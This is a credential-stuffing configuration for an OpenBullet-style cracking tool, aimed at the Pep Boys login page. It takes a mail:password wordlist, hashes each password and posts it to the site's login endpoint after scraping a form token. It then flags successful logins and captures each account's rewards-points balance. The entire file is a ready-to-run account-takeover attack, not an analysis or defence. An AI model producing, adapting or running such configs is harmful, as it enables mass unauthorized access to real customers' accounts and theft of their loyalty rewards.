[SETTINGS]
{
  "Name": "pepboys",
  "SuggestedBots": 7,
  "LastModified": "2018-07-02T00:53:16.5110338+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
FUNCTION Hash MD5 "<PASS>" -> VAR "ENC" 
REQUEST GET "https://www.pepboys.com/account/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" CSS "[class=dnf]" "value" 0 -> VAR "DNF" "" "" 
REQUEST POST "https://www.pepboys.com/processLogin" AutoRedirect=TRUE 
  CONTENT "fill=&dnf=<DNF>&j_username=<USER>&j_password=<ENC>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.pepboys.com/account/login" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Host: www.pepboys.com" 
PARSE "<SOURCE>" LR "rewardsPoints\">" "</div>" Recursive=FALSE -> CAP "POINTS" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "logboxError" 
  KEYCHAIN Success OR 
    KEY "Hi," 
